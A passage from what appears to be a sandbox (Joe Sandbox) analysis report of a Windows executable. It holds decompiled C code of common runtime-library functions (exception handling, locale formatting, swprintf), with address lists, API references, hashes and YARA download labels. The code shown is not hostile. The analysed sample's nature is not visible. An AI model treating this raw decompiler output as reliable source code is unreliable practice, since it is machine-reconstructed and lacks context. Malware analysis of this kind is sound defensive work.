				 *((intOrPtr*)(E0040B6F6(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00404C96(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00408027(_t48, _t53, _t55, _t57, _t61);
				return E0040D2D9( *((intOrPtr*)(_t58 - 0x1c)));
			}







                                                                                                                                                                                                        0x00407f01
                                                                                                                                                                                                        0x00407f01
                                                                                                                                                                                                        0x00407f01
                                                                                                                                                                                                        0x00407f03
                                                                                                                                                                                                        0x00407f08
                                                                                                                                                                                                        0x00407f0d
                                                                                                                                                                                                        0x00407f0f
                                                                                                                                                                                                        0x00407f12
                                                                                                                                                                                                        0x00407f15
                                                                                                                                                                                                        0x00407f18
                                                                                                                                                                                                        0x00407f1f
                                                                                                                                                                                                        0x00407f30
                                                                                                                                                                                                        0x00407f3e
                                                                                                                                                                                                        0x00407f4c
                                                                                                                                                                                                        0x00407f54
                                                                                                                                                                                                        0x00407f62
                                                                                                                                                                                                        0x00407f68
                                                                                                                                                                                                        0x00407f6f
                                                                                                                                                                                                        0x00407f72
                                                                                                                                                                                                        0x00407f88
                                                                                                                                                                                                        0x00407f8b
                                                                                                                                                                                                        0x00408000
                                                                                                                                                                                                        0x00408007
                                                                                                                                                                                                        0x0040800e
                                                                                                                                                                                                        0x0040801b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __CreateFrameInfo.LIBCMT ref: 00407F29
                                                                                                                                                                                                          • Part of subcall function 00404BF1: __getptd.LIBCMT ref: 00404BFF
                                                                                                                                                                                                          • Part of subcall function 00404BF1: __getptd.LIBCMT ref: 00404C0D
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00407F33
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __getptd_noexit.LIBCMT ref: 0040B6F9
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __amsg_exit.LIBCMT ref: 0040B706
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00407F41
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00407F4F
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00407F5A
                                                                                                                                                                                                        • _CallCatchBlock2.LIBCMT ref: 00407F80
                                                                                                                                                                                                          • Part of subcall function 00404C96: __CallSettingFrame@12.LIBCMT ref: 00404CE2
                                                                                                                                                                                                          • Part of subcall function 00408027: __getptd.LIBCMT ref: 00408036
                                                                                                                                                                                                          • Part of subcall function 00408027: __getptd.LIBCMT ref: 00408044
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1602911419-0
                                                                                                                                                                                                        • Opcode ID: a9082bb619f5eb60629cdccbdd922cf3ae0bc7183406115def16ba247c36ffe8
                                                                                                                                                                                                        • Instruction ID: d736c13cd206db020babe6c2f5234d6dacf7d5bbd998fa3e3baa6f8d386cec23
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9082bb619f5eb60629cdccbdd922cf3ae0bc7183406115def16ba247c36ffe8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B1129B1C00209DFDB00EFA5C545B9E77B0FF04318F10846EF814A7292EB3999059F59
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00410742 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                                                        			E00410742(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x425248);
				E0040D294(__ebx, __edi, __esi);
				_t31 = E0040B6F6(__ebx, __edx, __edi, _t35);
				_t15 =  *0x429528; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D68E(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x429d48; // 0x2031638
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x429920;
								if(__eflags != 0) {
									_push(_t33);
									E00406C4C(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x429d48; // 0x2031638
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x429d48; // 0x2031638
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004107DD();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040C50B(_t29, _t31, 0x20);
				}
				return E0040D2D9(_t33);
			}










                                                                                                                                                                                                        0x00410742
                                                                                                                                                                                                        0x00410742
                                                                                                                                                                                                        0x00410742
                                                                                                                                                                                                        0x00410742
                                                                                                                                                                                                        0x00410744
                                                                                                                                                                                                        0x00410749
                                                                                                                                                                                                        0x00410753
                                                                                                                                                                                                        0x00410755
                                                                                                                                                                                                        0x0041075d
                                                                                                                                                                                                        0x0041077e
                                                                                                                                                                                                        0x00410784
                                                                                                                                                                                                        0x00410788
                                                                                                                                                                                                        0x0041078b
                                                                                                                                                                                                        0x0041078e
                                                                                                                                                                                                        0x00410794
                                                                                                                                                                                                        0x00410796
                                                                                                                                                                                                        0x00410798
                                                                                                                                                                                                        0x0041079b
                                                                                                                                                                                                        0x004107a1
                                                                                                                                                                                                        0x004107a3
                                                                                                                                                                                                        0x004107a5
                                                                                                                                                                                                        0x004107ab
                                                                                                                                                                                                        0x004107ad
                                                                                                                                                                                                        0x004107ae
                                                                                                                                                                                                        0x004107b3
                                                                                                                                                                                                        0x004107ab
                                                                                                                                                                                                        0x004107a3
                                                                                                                                                                                                        0x004107b4
                                                                                                                                                                                                        0x004107b9
                                                                                                                                                                                                        0x004107bc
                                                                                                                                                                                                        0x004107c2
                                                                                                                                                                                                        0x004107c6
                                                                                                                                                                                                        0x004107c6
                                                                                                                                                                                                        0x004107cc
                                                                                                                                                                                                        0x004107d3
                                                                                                                                                                                                        0x00410765
                                                                                                                                                                                                        0x00410765
                                                                                                                                                                                                        0x00410765
                                                                                                                                                                                                        0x0041076a
                                                                                                                                                                                                        0x0041076e
                                                                                                                                                                                                        0x00410773
                                                                                                                                                                                                        0x0041077b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 0041074E
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __getptd_noexit.LIBCMT ref: 0040B6F9
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __amsg_exit.LIBCMT ref: 0040B706
                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 0041076E
                                                                                                                                                                                                        • __lock.LIBCMT ref: 0041077E
                                                                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 0041079B
                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(02031638), ref: 004107C6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4271482742-0
                                                                                                                                                                                                        • Opcode ID: a42977f6e7ceec3f689bd588e4d4e93f8f1e1001c8aa15e33a934d697cb5037e
                                                                                                                                                                                                        • Instruction ID: bad8106a138496c333cffe7441060a311f2fa3a9b62a61513f8d4826e3485096
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a42977f6e7ceec3f689bd588e4d4e93f8f1e1001c8aa15e33a934d697cb5037e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30016D32E01621ABD721AB6998457DEB360AF04764F54012BE820B76D1CB7CADC2DFDD
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041F4B0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 245COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041F4B0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char* _a28, char _a32) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _t123;
				intOrPtr _t128;
				signed char _t131;
				intOrPtr* _t134;
				intOrPtr* _t144;
				intOrPtr* _t149;
				intOrPtr* _t153;
				void* _t154;
				void* _t155;
				char _t195;
				void* _t251;
				void* _t252;

				_t174 = __ebx;
				_t123 = E0041FAB0(__ebx, __edi, __eflags, E0041D440(_a20,  &_v60));
				_t252 = _t251 + 4;
				_v12 = _t123;
				E0041D370( &_v60);
				E0041FA80(_v12,  &_v48);
				if( *_a28 == 0x2b ||  *_a28 == 0x2d) {
					_v100 = 1;
				} else {
					if( *_a28 != 0x30 ||  *((char*)(_a28 + 1)) != 0x78 &&  *((char*)(_a28 + 1)) != 0x58) {
						_v96 = 0;
					} else {
						_v96 = 2;
					}
					_v100 = _v96;
				}
				_v16 = _v100;
				if( *((char*)(E00401380( &_v48))) == 0x7f ||  *((char*)(E00401380( &_v48))) <= 0) {
					L18:
					_t128 = E0041DF60(_a20);
					__eflags = _t128;
					if(_t128 <= 0) {
						L21:
						_v104 = 0;
						L22:
						_v20 = _v104;
						_v8 = E0041D420(_a20) & 0x000001c0;
						__eflags = _v8 - 0x40;
						if(_v8 == 0x40) {
							L25:
							__eflags = _v8 - 0x100;
							if(_v8 == 0x100) {
								_t144 = E0041F880(_a4,  &_v76, _a12, _a16, _a28, _v16);
								_a12 =  *_t144;
								_a16 =  *((intOrPtr*)(_t144 + 4));
								_a28 = _a28 + _v16;
								_t89 =  &_a32; // 0x41e634
								_t195 =  *_t89 - _v16;
								__eflags = _t195;
								_a32 = _t195;
								_t149 = E0041F7D0(_a4,  &_v84, _a12, _a16, _a24 & 0x000000ff, _v20);
								_t252 = _t252 + 0x30;
								_a12 =  *_t149;
								_a16 =  *((intOrPtr*)(_t149 + 4));
								_v20 = 0;
							}
							L27:
							_t131 = E0041FA60(_v12);
							_t103 =  &_a32; // 0x41e634
							_t134 = E0041F8F0(_a4,  &_v92, _a12, _a16, _a28,  *_t103, _t131 & 0x000000ff);
							_a12 =  *_t134;
							_a16 =  *((intOrPtr*)(_t134 + 4));
							E0041DF80(_a20, 0);
							E0041F7D0(_a4, _a8, _a12, _a16, _a24 & 0x000000ff, _v20);
							E00401070( &_v48);
							return _a8;
						}
						__eflags = _v8 - 0x100;
						if(_v8 == 0x100) {
							goto L25;
						}
						_t153 = E0041F7D0(_a4,  &_v68, _a12, _a16, _a24 & 0x000000ff, _v20);
						_t252 = _t252 + 0x18;
						_a12 =  *_t153;
						_a16 =  *((intOrPtr*)(_t153 + 4));
						_v20 = 0;
						goto L27;
					}
					_t154 = E0041DF60(_a20);
					_t55 =  &_a32; // 0x41e634
					__eflags = _t154 -  *_t55;
					if(_t154 <=  *_t55) {
						goto L21;
					}
					_t155 = E0041DF60(_a20);
					_t57 =  &_a32; // 0x41e634
					_v104 = _t155 -  *_t57;
					goto L22;
				} else {
					_v52 = E00401380( &_v48);
					_t25 =  &_a32; // 0x41e634
					_v56 =  *_t25;
					while( *_v52 != 0x7f &&  *_v52 > 0 &&  *_v52 < _v56 - _v16) {
						_v56 = _v56 -  *_v52;
						_t35 =  &_a32; // 0x41e634
						_t39 =  &_a32; // 0x41e634
						E00406973(_t174, _a28 + _v56 + 1,  *_t39 + 1 - _v56, _a28 + _v56,  *_t35 + 1 - _v56);
						_t252 = _t252 + 0x10;
						 *((char*)(_a28 + _v56)) = 0;
						_t47 =  &_a32; // 0x41e634
						_a32 =  *_t47 + 1;
						if( *((char*)(_v52 + 1)) > 0) {
							_v52 = _v52 + 1;
						}
					}
					goto L18;
				}
			}






























                                                                                                                                                                                                        0x0041f4b0
                                                                                                                                                                                                        0x0041f4c3
                                                                                                                                                                                                        0x0041f4c8
                                                                                                                                                                                                        0x0041f4cb
                                                                                                                                                                                                        0x0041f4d1
                                                                                                                                                                                                        0x0041f4dd
                                                                                                                                                                                                        0x0041f4eb
                                                                                                                                                                                                        0x0041f533
                                                                                                                                                                                                        0x0041f4f8
                                                                                                                                                                                                        0x0041f501
                                                                                                                                                                                                        0x0041f524
                                                                                                                                                                                                        0x0041f51b
                                                                                                                                                                                                        0x0041f51b
                                                                                                                                                                                                        0x0041f51b
                                                                                                                                                                                                        0x0041f52e
                                                                                                                                                                                                        0x0041f52e
                                                                                                                                                                                                        0x0041f53d
                                                                                                                                                                                                        0x0041f54e
                                                                                                                                                                                                        0x0041f608
                                                                                                                                                                                                        0x0041f60b
                                                                                                                                                                                                        0x0041f610
                                                                                                                                                                                                        0x0041f612
                                                                                                                                                                                                        0x0041f631
                                                                                                                                                                                                        0x0041f631
                                                                                                                                                                                                        0x0041f638
                                                                                                                                                                                                        0x0041f63b
                                                                                                                                                                                                        0x0041f64b
                                                                                                                                                                                                        0x0041f64e
                                                                                                                                                                                                        0x0041f652
                                                                                                                                                                                                        0x0041f692
                                                                                                                                                                                                        0x0041f692
                                                                                                                                                                                                        0x0041f699
                                                                                                                                                                                                        0x0041f6b3
                                                                                                                                                                                                        0x0041f6c0
                                                                                                                                                                                                        0x0041f6c3
                                                                                                                                                                                                        0x0041f6cc
                                                                                                                                                                                                        0x0041f6cf
                                                                                                                                                                                                        0x0041f6d2
                                                                                                                                                                                                        0x0041f6d2
                                                                                                                                                                                                        0x0041f6d5
                                                                                                                                                                                                        0x0041f6f1
                                                                                                                                                                                                        0x0041f6f6
                                                                                                                                                                                                        0x0041f6fe
                                                                                                                                                                                                        0x0041f701
                                                                                                                                                                                                        0x0041f704
                                                                                                                                                                                                        0x0041f704
                                                                                                                                                                                                        0x0041f70b
                                                                                                                                                                                                        0x0041f70e
                                                                                                                                                                                                        0x0041f717
                                                                                                                                                                                                        0x0041f72f
                                                                                                                                                                                                        0x0041f73c
                                                                                                                                                                                                        0x0041f73f
                                                                                                                                                                                                        0x0041f747
                                                                                                                                                                                                        0x0041f765
                                                                                                                                                                                                        0x0041f770
                                                                                                                                                                                                        0x0041f77b
                                                                                                                                                                                                        0x0041f77b
                                                                                                                                                                                                        0x0041f654
                                                                                                                                                                                                        0x0041f65b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041f676
                                                                                                                                                                                                        0x0041f67b
                                                                                                                                                                                                        0x0041f683
                                                                                                                                                                                                        0x0041f686
                                                                                                                                                                                                        0x0041f689
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041f689
                                                                                                                                                                                                        0x0041f617
                                                                                                                                                                                                        0x0041f61c
                                                                                                                                                                                                        0x0041f61c
                                                                                                                                                                                                        0x0041f61f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041f624
                                                                                                                                                                                                        0x0041f629
                                                                                                                                                                                                        0x0041f62c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041f567
                                                                                                                                                                                                        0x0041f56f
                                                                                                                                                                                                        0x0041f572
                                                                                                                                                                                                        0x0041f575
                                                                                                                                                                                                        0x0041f578
                                                                                                                                                                                                        0x0041f5ac
                                                                                                                                                                                                        0x0041f5af
                                                                                                                                                                                                        0x0041f5c0
                                                                                                                                                                                                        0x0041f5d5
                                                                                                                                                                                                        0x0041f5da
                                                                                                                                                                                                        0x0041f5e3
                                                                                                                                                                                                        0x0041f5e6
                                                                                                                                                                                                        0x0041f5ec
                                                                                                                                                                                                        0x0041f5f8
                                                                                                                                                                                                        0x0041f600
                                                                                                                                                                                                        0x0041f600
                                                                                                                                                                                                        0x0041f603
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041f578

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0041D440: std::locale::locale.LIBCPMTD ref: 0041D451
                                                                                                                                                                                                          • Part of subcall function 0041FAB0: std::_Lockit::_Lockit.LIBCPMT ref: 0041FABB
                                                                                                                                                                                                          • Part of subcall function 0041FAB0: int.LIBCPMTD ref: 0041FACD
                                                                                                                                                                                                          • Part of subcall function 0041FAB0: std::locale::_Getfacet.LIBCPMTD ref: 0041FADC
                                                                                                                                                                                                          • Part of subcall function 0041D370: std::locale::facet::_Decref.LIBCPMTD ref: 0041D386
                                                                                                                                                                                                        • _memmove_s.LIBCMT ref: 0041F5D5
                                                                                                                                                                                                        • std::ios_base::width.LIBCPMTD ref: 0041F747
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DecrefGetfacetLockitLockit::__memmove_sstd::_std::ios_base::widthstd::locale::_std::locale::facet::_std::locale::locale
                                                                                                                                                                                                        • String ID: 4A$@
                                                                                                                                                                                                        • API String ID: 3492058185-2914105643
                                                                                                                                                                                                        • Opcode ID: 6f4bfb96f4ee5afbe46bc0b3f07b2a126c4fe86f766943909cd89c288331bbe1
                                                                                                                                                                                                        • Instruction ID: b6c4a3b8c94fdb9aa047002bef48bd8eb04d08bf537c12304cab257c8651ecb0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f4bfb96f4ee5afbe46bc0b3f07b2a126c4fe86f766943909cd89c288331bbe1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04A12BB1900148AFCB04DF98D9909EE7BB6BF49304F14825EF819A7355D738EE46CB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041E7B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                                                                                        			E0041E7B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed char _a20, signed int _a24) {
				signed char _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				long _v132;
				char _v140;
				intOrPtr _v144;
				signed int _v145;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				signed char _v164;
				signed char _t81;
				void* _t95;
				signed int _t109;
				void* _t120;
				void* _t121;
				void* _t122;

				_t121 = __esi;
				_t120 = __edi;
				_t95 = __ebx;
				_v152 = __ecx;
				_v20 = 0x6c;
				if(E0041E9D0(_a16) > 0 || (E0041D420(_a16) & 0x00002000) != 0) {
					_v156 = E0041E9D0(_a16);
				} else {
					_v156 = 6;
				}
				_v16 = _v156;
				if(_v16 <= 0x24) {
					_v160 = _v16;
				} else {
					_v160 = 0x24;
				}
				_v144 = _v160;
				_v16 = _v16 - _v144;
				_v8 = 0;
				_v12 = 0;
				_t81 = E0041D420(_a16) & 0x00003000;
				if(_t81 == 0x2000) {
					asm("fcomp qword [ebp+0x1c]");
					asm("fnstsw ax");
					if((_t81 & 0x00000044) == 0) {
						asm("fldz");
						asm("fcomp qword [ebp+0x1c]");
						asm("fnstsw ax");
						if((_t81 & 0x00000041) != 0) {
							_v164 = 0;
						} else {
							_v164 = 1;
						}
						_v145 = _v164;
						if((_v145 & 0x000000ff) != 0) {
							asm("fchs");
						}
						while(1) {
							asm("fcomp qword [0x421980]");
							asm("fnstsw ax");
							if((_t81 & 0x00000001) != 0 || _v8 >= 0x1388) {
								break;
							}
							_a24 = _a24 /  *0x421978;
							_t81 = _v8 + 0xa;
							_v8 = _t81;
						}
						asm("fcomp qword [0x421988]");
						asm("fnstsw ax");
						__eflags = _t81 & 0x00000041;
						if((_t81 & 0x00000041) == 0) {
							while(1) {
								__eflags = _v16 - 0xa;
								if(_v16 < 0xa) {
									goto L26;
								}
								asm("fcomp qword [ebp+0x1c]");
								asm("fnstsw ax");
								__eflags = _t81 & 0x00000001;
								if((_t81 & 0x00000001) == 0) {
									__eflags = _v12 - 0x1388;
									if(_v12 < 0x1388) {
										_a24 = _a24 *  *0x421978;
										_v16 = _v16 - 0xa;
										_t109 = _v12 + 0xa;
										__eflags = _t109;
										_v12 = _t109;
										continue;
									}
								}
								goto L26;
							}
						}
						L26:
						__eflags = _v145 & 0x000000ff;
						if((_v145 & 0x000000ff) != 0) {
							asm("fchs");
						}
					}
				}
				 *(_t122 - 8) = _a24;
				_push(_v144);
				E0041ED90(_t95, _t120, _t121, __eflags, _v152, _a4, _a8, _a12, _a16, _a20 & 0x000000ff,  &_v132, _v8, _v12, _v16, swprintf( &_v132, 0x6c, E0041ECB0(_v152,  &_v140, 0, E0041D420(_a16))));
				return _a4;
			}





















                                                                                                                                                                                                        0x0041e7b0
                                                                                                                                                                                                        0x0041e7b0
                                                                                                                                                                                                        0x0041e7b0
                                                                                                                                                                                                        0x0041e7b9
                                                                                                                                                                                                        0x0041e7bf
                                                                                                                                                                                                        0x0041e7d0
                                                                                                                                                                                                        0x0041e7f5
                                                                                                                                                                                                        0x0041e7e1
                                                                                                                                                                                                        0x0041e7e1
                                                                                                                                                                                                        0x0041e7e1
                                                                                                                                                                                                        0x0041e801
                                                                                                                                                                                                        0x0041e808
                                                                                                                                                                                                        0x0041e819
                                                                                                                                                                                                        0x0041e80a
                                                                                                                                                                                                        0x0041e80a
                                                                                                                                                                                                        0x0041e80a
                                                                                                                                                                                                        0x0041e825
                                                                                                                                                                                                        0x0041e834
                                                                                                                                                                                                        0x0041e837
                                                                                                                                                                                                        0x0041e83e
                                                                                                                                                                                                        0x0041e84d
                                                                                                                                                                                                        0x0041e857
                                                                                                                                                                                                        0x0041e866
                                                                                                                                                                                                        0x0041e869
                                                                                                                                                                                                        0x0041e86e
                                                                                                                                                                                                        0x0041e874
                                                                                                                                                                                                        0x0041e876
                                                                                                                                                                                                        0x0041e879
                                                                                                                                                                                                        0x0041e87e
                                                                                                                                                                                                        0x0041e88c
                                                                                                                                                                                                        0x0041e880
                                                                                                                                                                                                        0x0041e880
                                                                                                                                                                                                        0x0041e880
                                                                                                                                                                                                        0x0041e89c
                                                                                                                                                                                                        0x0041e8ab
                                                                                                                                                                                                        0x0041e8b0
                                                                                                                                                                                                        0x0041e8b2
                                                                                                                                                                                                        0x0041e8c0
                                                                                                                                                                                                        0x0041e8c3
                                                                                                                                                                                                        0x0041e8c9
                                                                                                                                                                                                        0x0041e8ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041e8e2
                                                                                                                                                                                                        0x0041e8ba
                                                                                                                                                                                                        0x0041e8bd
                                                                                                                                                                                                        0x0041e8bd
                                                                                                                                                                                                        0x0041e8ea
                                                                                                                                                                                                        0x0041e8f0
                                                                                                                                                                                                        0x0041e8f2
                                                                                                                                                                                                        0x0041e8f5
                                                                                                                                                                                                        0x0041e902
                                                                                                                                                                                                        0x0041e902
                                                                                                                                                                                                        0x0041e906
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041e90e
                                                                                                                                                                                                        0x0041e911
                                                                                                                                                                                                        0x0041e913
                                                                                                                                                                                                        0x0041e916
                                                                                                                                                                                                        0x0041e918
                                                                                                                                                                                                        0x0041e91f
                                                                                                                                                                                                        0x0041e92a
                                                                                                                                                                                                        0x0041e933
                                                                                                                                                                                                        0x0041e8fc
                                                                                                                                                                                                        0x0041e8fc
                                                                                                                                                                                                        0x0041e8ff
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041e8ff
                                                                                                                                                                                                        0x0041e91f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041e916
                                                                                                                                                                                                        0x0041e902
                                                                                                                                                                                                        0x0041e938
                                                                                                                                                                                                        0x0041e93f
                                                                                                                                                                                                        0x0041e941
                                                                                                                                                                                                        0x0041e946
                                                                                                                                                                                                        0x0041e948
                                                                                                                                                                                                        0x0041e941
                                                                                                                                                                                                        0x0041e86e
                                                                                                                                                                                                        0x0041e951
                                                                                                                                                                                                        0x0041e95a
                                                                                                                                                                                                        0x0041e9b8
                                                                                                                                                                                                        0x0041e9c6

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                        • String ID: $$$$l
                                                                                                                                                                                                        • API String ID: 233258989-1469801561
                                                                                                                                                                                                        • Opcode ID: 97d17a94d436c842e3f8c2928b688944c1465ae4255c1259152315e3aba56471
                                                                                                                                                                                                        • Instruction ID: 3c94a0c346cc92c29fdf28e7622c72ac2147586bbe3f6fa93345d3e70a4f15ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97d17a94d436c842e3f8c2928b688944c1465ae4255c1259152315e3aba56471
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36516DB490021DDBDF14DF56D954BEEBB74BF44300F00819AE999A3281DB389AE6CF19
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041E9F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                                                        Download Yara Rule
